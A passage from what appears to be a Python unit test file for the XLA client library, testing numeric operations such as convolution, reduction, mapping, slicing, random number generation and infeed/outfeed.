                         [880., 940., 1000., 380.],
                         [1120., 1180., 1240., 460.]]]])
    self._ExecuteAndCompareClose(c, expected=result)

  def testConvF32Valid(self):
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 2, 3, 4)
    rhs = a(1, 2, 1, 2) * 10
    c.Conv(c.Constant(lhs), c.Constant(rhs), [2, 1],
           xla_client.PaddingType.VALID)
    result = np.array([[[[640., 700., 760.],
                         [1120., 1180., 1240.]]]])
    self._ExecuteAndCompareClose(c, expected=result)

  def testConvWithGeneralPaddingF32(self):
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
                             strides, pads, lhs_dilation, rhs_dilation)
    result = np.array([[[[0., 0., 0.],
                         [10., 20., 0.],
                         [0., 0., 0.],
                         [40., 50., 0.]]]])
    self._ExecuteAndCompareClose(c, expected=result)

  def testBooleanNot(self):
    c = self._NewComputation()
    arr = NumpyArrayBool([True, False, True])
    c.Not(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=~arr)

  def testExp(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    c.Exp(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=np.exp(arr))

  def testRound(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    c.Round(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=np.round(arr))

  def testLog(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    c.Log(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=np.log(arr))

  def testNeg(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    c.Neg(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=-arr)

  def testFloor(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    c.Floor(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=np.floor(arr))

  def testCeil(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    c.Ceil(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=np.ceil(arr))

  def testAbs(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
    c.Abs(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=np.abs(arr))

  def testTanh(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    c.Tanh(c.Constant(arr))
    self._ExecuteAndCompareClose(c, expected=np.tanh(arr))

  def testTrans(self):

    def _TransposeAndTest(array):
      c = self._NewComputation()
      c.Trans(c.Constant(array))
      self._ExecuteAndCompareClose(c, expected=array.T)

    # Test square and non-square matrices in both default (C) and F orders.
    for array_fun in [NumpyArrayF32, NumpyArrayF64]:
      _TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
      _TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
      _TransposeAndTest(array_fun([[1, 2], [4, 5]]))
      _TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))

  def testTranspose(self):

    def _TransposeAndTest(array, permutation):
      c = self._NewComputation()
      c.Transpose(c.Constant(array), permutation)
      expected = np.transpose(array, permutation)
      self._ExecuteAndCompareClose(c, expected=expected)

    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])

    arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
    for permutation in itertools.permutations(range(arr.ndim)):
      _TransposeAndTest(arr, permutation)
      _TransposeAndTest(np.asfortranarray(arr), permutation)

  def testEq(self):
    c = self._NewComputation()
    c.Eq(
        c.Constant(NumpyArrayS32([1, 2, 3, 4])),
        c.Constant(NumpyArrayS32([4, 2, 3, 1])))
    self._ExecuteAndCompareExact(c, expected=[False, True, True, False])

  def testNe(self):
    c = self._NewComputation()
    c.Ne(
        c.Constant(NumpyArrayS32([1, 2, 3, 4])),
        c.Constant(NumpyArrayS32([4, 2, 3, 1])))
    self._ExecuteAndCompareExact(c, expected=[True, False, False, True])

    # NaN != anything (including NaN) is True per IEEE semantics.
    c.Ne(
        c.Constant(NumpyArrayF32([-2.0, 0.0, float("nan"), float("nan")])),
        c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
    self._ExecuteAndAssertWith(
        np.testing.assert_allclose, c, (), expected=[True, False, True, True])

  def testGt(self):
    c = self._NewComputation()
    c.Gt(
        c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
        c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])

  def testGe(self):
    c = self._NewComputation()
    c.Ge(
        c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
        c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])

  def testLt(self):
    c = self._NewComputation()
    c.Lt(
        c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
        c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])

  def testLe(self):
    c = self._NewComputation()
    c.Le(
        c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
        c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])

  def testMax(self):
    c = self._NewComputation()
    c.Max(
        c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
        c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
    self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])

  def testMaxExplicitBroadcastDim0(self):
    c = self._NewComputation()
    c.Max(
        c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayF32([3, 4, 5])),
        broadcast_dimensions=(0,))
    self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])

  def testMaxExplicitBroadcastDim1(self):
    c = self._NewComputation()
    c.Max(
        c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayF32([3, 4, 5])),
        broadcast_dimensions=(1,))
    self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])

  def testMin(self):
    c = self._NewComputation()
    c.Min(
        c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
        c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
    self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])

  def testPad(self):
    # Padding triples are (edge_low, edge_high, interior) per dimension.
    c = self._NewComputation()
    c.Pad(
        c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
        c.Constant(NumpyArrayF32(0.0)),
        [(1, 2, 1), (0, 1, 0)])
    self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
                                              [1.0, 2.0, 0.0],
                                              [0.0, 0.0, 0.0],
                                              [3.0, 4.0, 0.0],
                                              [0.0, 0.0, 0.0],
                                              [0.0, 0.0, 0.0]])

  def testPadWithPaddingConfig(self):
    # Same as testPad but with padding expressed as a PaddingConfig proto.
    c = self._NewComputation()
    padding_config = xla_client.xla_data_pb2.PaddingConfig()
    for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
      dimension = padding_config.dimensions.add()
      dimension.edge_padding_low = lo
      dimension.edge_padding_high = hi
      dimension.interior_padding = interior
    c.Pad(
        c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
        c.Constant(NumpyArrayF32(0.0)),
        padding_config)
    self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
                                              [1.0, 2.0, 0.0],
                                              [0.0, 0.0, 0.0],
                                              [3.0, 4.0, 0.0],
                                              [0.0, 0.0, 0.0],
                                              [0.0, 0.0, 0.0]])

  def testReshape(self):
    c = self._NewComputation()
    c.Reshape(
        c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
        dimensions=[0, 1],
        new_sizes=[2, 3])
    self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])

  def testCollapse(self):
    c = self._NewComputation()
    c.Collapse(
        c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
        dimensions=[1, 2])
    self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])

  def testRev(self):
    c = self._NewComputation()
    c.Rev(
        c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
        dimensions=[0, 2])
    self._ExecuteAndCompareExact(
        c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])

  def testClampF32(self):
    c = self._NewComputation()
    c.Clamp(
        c.Constant(NumpyArrayF32(-1)),
        c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
        c.Constant(NumpyArrayF32(2)))
    self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])

  # TODO(b/72689392): re-enable when bug S32 resolved
  def DISABLED_testClampS32(self):
    c = self._NewComputation()
    c.Clamp(
        c.Constant(NumpyArrayS32(-1)),
        c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
        c.Constant(NumpyArrayS32(2)))
    self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])

  def testSelect(self):
    c = self._NewComputation()
    c.Select(
        c.Constant(NumpyArrayBool([True, False, False, True, False])),
        c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
        c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
    self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])

  def testSlice(self):
    c = self._NewComputation()
    c.Slice(
        c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        [1, 0],
        [3, 2])
    self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])

  def testDynamicSlice(self):
    c = self._NewComputation()
    c.DynamicSlice(
        c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayS32([1, 0])),
        [2, 2])
    self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])

  def testDynamicUpdateSlice(self):
    c = self._NewComputation()
    c.DynamicUpdateSlice(
        c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
        c.Constant(NumpyArrayS32([1, 1])))
    self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])

  def testTuple(self):
    c = self._NewComputation()
    c.Tuple(
        c.ConstantS32Scalar(42),
        c.Constant(NumpyArrayF32([1.0, 2.0])),
        c.Constant(NumpyArrayBool([True, False, False, True])))
    result = c.Build().Compile().Execute()
    self.assertIsInstance(result, tuple)
    np.testing.assert_equal(result[0], 42)
    np.testing.assert_allclose(result[1], [1.0, 2.0])
    np.testing.assert_equal(result[2], [True, False, False, True])

  def testGetTupleElement(self):
    c = self._NewComputation()
    c.GetTupleElement(
        c.Tuple(
            c.ConstantS32Scalar(42),
            c.Constant(NumpyArrayF32([1.0, 2.0])),
            c.Constant(NumpyArrayBool([True, False, False, True]))),
        1)
    self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])

  def testBroadcast(self):
    c = self._NewComputation()
    c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
    self._ExecuteAndCompareExact(
        c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])

  def testRngNormal(self):
    shape = (2, 3)
    c = self._NewComputation()
    c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
                dims=shape)
    result = c.Build().Compile().Execute()
    # since the result is random, we just check shape and uniqueness
    self.assertEqual(result.shape, shape)
    self.assertEqual(len(np.unique(result)), np.prod(shape))

  def testRngUniformF32(self):
    lo, hi = 2., 4.
    shape = (2, 3)
    c = self._NewComputation()
    c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
                 dims=shape)
    result = c.Build().Compile().Execute()
    # since the result is random, we just check shape, uniqueness, and range
    self.assertEqual(result.shape, shape)
    self.assertEqual(len(np.unique(result)), np.prod(shape))
    self.assertTrue(np.all(lo <= result))
    self.assertTrue(np.all(result < hi))

  def testRngUniformS32(self):
    lo, hi = 2, 4
    shape = (2, 3)
    c = self._NewComputation()
    c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
                 dims=shape)
    result = c.Build().Compile().Execute()
    # since the result is random, we just check shape, integrality, and range
    self.assertEqual(result.shape, shape)
    self.assertEqual(result.dtype, np.int32)
    self.assertTrue(np.all(lo <= result))
    self.assertTrue(np.all(result < hi))


class EmbeddedComputationsTest(LocalComputationTest):
  """Tests for XLA graphs with embedded computations (such as maps)."""

  def _CreateConstantS32Computation(self):
    """Computation (f32) -> s32 that returns a constant 1 for any input."""
    c = self._NewComputation("constant_s32_one")
    # TODO(eliben): consider adding a nicer way to create new parameters without
    # having to create dummy Numpy arrays or populating Shape messages. Perhaps
    # we need our own (Python-client-own) way to represent Shapes conveniently.
    c.ParameterFromNumpy(NumpyArrayF32(0))
    c.ConstantS32Scalar(1)
    return c.Build()

  def _CreateConstantS64Computation(self):
    """Computation (f64) -> s64 that returns a constant 1 for any input."""
    c = self._NewComputation("constant_s64_one")
    # TODO(eliben): consider adding a nicer way to create new parameters without
    # having to create dummy Numpy arrays or populating Shape messages. Perhaps
    # we need our own (Python-client-own) way to represent Shapes conveniently.
    c.ParameterFromNumpy(NumpyArrayF64(0))
    c.ConstantS64Scalar(1)
    return c.Build()

  def _CreateConstantF32Computation(self):
    """Computation (f32) -> f32 that returns a constant 1.0 for any input."""
    c = self._NewComputation("constant_f32_one")
    c.ParameterFromNumpy(NumpyArrayF32(0))
    c.ConstantF32Scalar(1.0)
    return c.Build()

  def _CreateConstantF64Computation(self):
    """Computation (f64) -> f64 that returns a constant 1.0 for any input."""
    c = self._NewComputation("constant_f64_one")
    c.ParameterFromNumpy(NumpyArrayF64(0))
    c.ConstantF64Scalar(1.0)
    return c.Build()

  def _CreateMulF32By2Computation(self):
    """Computation (f32) -> f32 that multiplies its parameter by 2."""
    c = self._NewComputation("mul_f32_by2")
    c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
    return c.Build()

  def _CreateMulF64By2Computation(self):
    """Computation (f64) -> f64 that multiplies its parameter by 2."""
    c = self._NewComputation("mul_f64_by2")
    c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
    return c.Build()

  def _CreateBinaryAddF32Computation(self):
    """Computation (f32, f32) -> f32 that adds its two parameters."""
    c = self._NewComputation("add_param0_by_param1")
    c.Add(
        c.ParameterFromNumpy(NumpyArrayF32(0)),
        c.ParameterFromNumpy(NumpyArrayF32(0)))
    return c.Build()

  def _CreateBinaryAddF64Computation(self):
    """Computation (f64, f64) -> f64 that adds its two parameters."""
    c = self._NewComputation("add_param0_by_param1")
    c.Add(
        c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0))) return c.Build() def _CreateBinaryDivF32Computation(self): """Computation (f32, f32) -> f32 that divides its two parameters.""" c = self._NewComputation("div_param0_by_param1") c.Div( c.ParameterFromNumpy(NumpyArrayF32(0)), c.ParameterFromNumpy(NumpyArrayF32(0))) return c.Build() def _CreateBinaryDivF64Computation(self): """Computation (f64, f64) -> f64 that divides its two parameters.""" c = self._NewComputation("div_param0_by_param1") c.Div( c.ParameterFromNumpy(NumpyArrayF64(0)), c.ParameterFromNumpy(NumpyArrayF64(0))) return c.Build() def _CreateTestF32Lt10Computation(self): """Computation (f32) -> bool that tests if its parameter is less than 10.""" c = self._NewComputation("test_f32_lt_10") c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.)) return c.Build() def _CreateTestF64Lt10Computation(self): """Computation (f64) -> bool that tests if its parameter is less than 10.""" c = self._NewComputation("test_f64_lt_10") c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.)) return c.Build() def _CreateBinaryGeF32Computation(self): """Computation (f32, f32) -> bool that tests first_param >= second_param.""" c = self._NewComputation("param0_lt_param1") c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ParameterFromNumpy(NumpyArrayF32(0))) return c.Build() def _CreateBinaryGeF64Computation(self): """Computation (f64, f64) -> bool that tests first_param >= second_param.""" c = self._NewComputation("param0_lt_param1") c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ParameterFromNumpy(NumpyArrayF64(0))) return c.Build() def _MakeSample3DArrayF32(self): return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]]) def _MakeSample3DArrayF64(self): return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]]) def testCallF32(self): c = self._NewComputation() c.Call( 
self._CreateMulF32By2Computation(), operands=(c.ConstantF32Scalar(5.0),)) self._ExecuteAndCompareClose(c, expected=10.0) def testCallF64(self): c = self._NewComputation() c.Call( self._CreateMulF64By2Computation(), operands=(c.ConstantF64Scalar(5.0),)) self._ExecuteAndCompareClose(c, expected=10.0) def testMapEachElementToS32Constant(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantS32Computation(), [0]) self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1]) def testMapEachElementToS64Constant(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantS64Computation(), [0]) self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1]) def testMapMulBy2F32(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))], self._CreateMulF32By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0]) def testMapMulBy2F64(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))], self._CreateMulF64By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0]) def testSimpleMapChainF32(self): # Chains a map of constant-f32 with a map of mul-by-2 c = self._NewComputation() const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantF32Computation(), [0]) c.Map([const_f32], self._CreateMulF32By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0]) def testSimpleMapChainF64(self): # Chains a map of constant-f64 with a map of mul-by-2 c = self._NewComputation() const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantF64Computation(), [0]) c.Map([const_f64], self._CreateMulF64By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0]) def testDivVectorsWithMapF32(self): c = self._NewComputation() c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])), 
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))), self._CreateBinaryDivF32Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0]) def testDivVectorsWithMapF64(self): c = self._NewComputation() c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])), c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))), self._CreateBinaryDivF64Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0]) def testSelectAndScatterF32(self): c = self._NewComputation() c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])), select=self._CreateBinaryGeF32Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID, source=c.Constant(NumpyArrayF32([[0.1, 0.2]])), init_value=c.Constant(NumpyArrayF32(1)), scatter=self._CreateBinaryAddF32Computation()) self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]]) def testSelectAndScatterF64(self): c = self._NewComputation() c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])), select=self._CreateBinaryGeF64Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID, source=c.Constant(NumpyArrayF64([[0.1, 0.2]])), init_value=c.Constant(NumpyArrayF64(1)), scatter=self._CreateBinaryAddF64Computation()) self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]]) def testReduce1DtoScalarF32(self): c = self._NewComputation() c.Reduce( operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=10) def testReduce1DtoScalarF64(self): c = self._NewComputation() c.Reduce( operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=10) def testReduce2DTo1DDim0F32(self): 
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=[5, 7, 9]) def testReduce2DTo1DDim0F64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=[5, 7, 9]) def testReduce2DTo1DDim1F32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=[1]) self._ExecuteAndCompareClose(c, expected=[6, 15]) def testReduce2DTo1DDim1F64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=[1]) self._ExecuteAndCompareClose(c, expected=[6, 15]) def testReduce3DAllPossibleWaysF32(self): input_array = self._MakeSample3DArrayF32() def _ReduceAndTest(*dims): c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=dims) self._ExecuteAndCompareClose( c, expected=np.sum(input_array, axis=tuple(dims))) _ReduceAndTest(0) _ReduceAndTest(0) _ReduceAndTest(0, 1) _ReduceAndTest(0, 2) _ReduceAndTest(1, 2) _ReduceAndTest(0, 1, 2) def testReduce3DAllPossibleWaysF64(self): input_array = self._MakeSample3DArrayF64() def _ReduceAndTest(*dims): c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), 
init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=dims) self._ExecuteAndCompareClose( c, expected=np.sum(input_array, axis=tuple(dims))) _ReduceAndTest(0) _ReduceAndTest(0) _ReduceAndTest(0, 1) _ReduceAndTest(0, 2) _ReduceAndTest(1, 2) _ReduceAndTest(0, 1, 2) def testReduceWindowValidUnitStridesF32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.VALID) self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]]) def testReduceWindowSameUnitStridesF32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.SAME) self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]]) def testReduceWindowValidGeneralStridesF32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID) self._ExecuteAndCompareClose(c, expected=[[5., 9.]]) def testReduceWindowValidUnitStridesF64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.VALID) 
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]]) def testReduceWindowSameUnitStridesF64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.SAME) self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]]) def testReduceWindowValidGeneralStridesF64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID) self._ExecuteAndCompareClose(c, expected=[[5., 9.]]) def testWhileF32(self): cond = self._CreateTestF32Lt10Computation() body = self._CreateMulF32By2Computation() c = self._NewComputation() init = c.ConstantF32Scalar(1.) c.While(cond, body, init) self._ExecuteAndCompareClose(c, expected=16.) def testWhileF64(self): cond = self._CreateTestF64Lt10Computation() body = self._CreateMulF64By2Computation() c = self._NewComputation() init = c.ConstantF64Scalar(1.) c.While(cond, body, init) self._ExecuteAndCompareClose(c, expected=16.) 
  def testInfeedS32Values(self):
    """Feeds four s32 scalars via infeed and executes once per value.

    Checks that values come back out of the compiled computation in the
    same order they were transferred to the infeed queue (FIFO).
    """
    to_infeed = NumpyArrayS32([1, 2, 3, 4])
    c = self._NewComputation()
    # The infeed shape is the shape of a single element, not the whole array.
    c.Infeed(xla_client.Shape.from_numpy(to_infeed[0]))
    compiled_c = c.Build().CompileWithExampleArguments()
    # Queue all values first, then drain them with repeated executions.
    for item in to_infeed:
      xla_client.transfer_to_infeed(item)

    for item in to_infeed:
      result = compiled_c.Execute()
      self.assertEqual(result, item)

  def testInfeedThenOutfeedS32(self):
    """Round-trips s32 scalars: infeed -> computation -> outfeed.

    Each Execute() blocks on both queues, so it runs on a worker thread
    while the main thread performs the infeed/outfeed transfers.
    """
    to_round_trip = NumpyArrayS32([1, 2, 3, 4])
    c = self._NewComputation()
    x = c.Infeed(xla_client.Shape.from_numpy(to_round_trip[0]))
    c.Outfeed(x)
    compiled_c = c.Build().CompileWithExampleArguments()

    for want in to_round_trip:
      # Execute on a separate thread: it will block until the infeed value
      # arrives and the outfeed value is consumed below.
      execution = threading.Thread(target=compiled_c.Execute)
      execution.start()
      xla_client.transfer_to_infeed(want)
      got = xla_client.transfer_from_outfeed(
          xla_client.Shape.from_numpy(to_round_trip[0]))
      execution.join()
      self.assertEqual(want, got)


class ErrorTest(LocalComputationTest):
  """Tests that client-side errors surface with useful diagnostics."""

  def setUp(self):
    # Two scalars of the same value but different element types, used to
    # provoke a shape/type mismatch at compile time.
    self.f32_scalar_2 = NumpyArrayF32(2.0)
    self.s32_scalar_2 = NumpyArrayS32(2)

  def testInvokeWithWrongElementType(self):
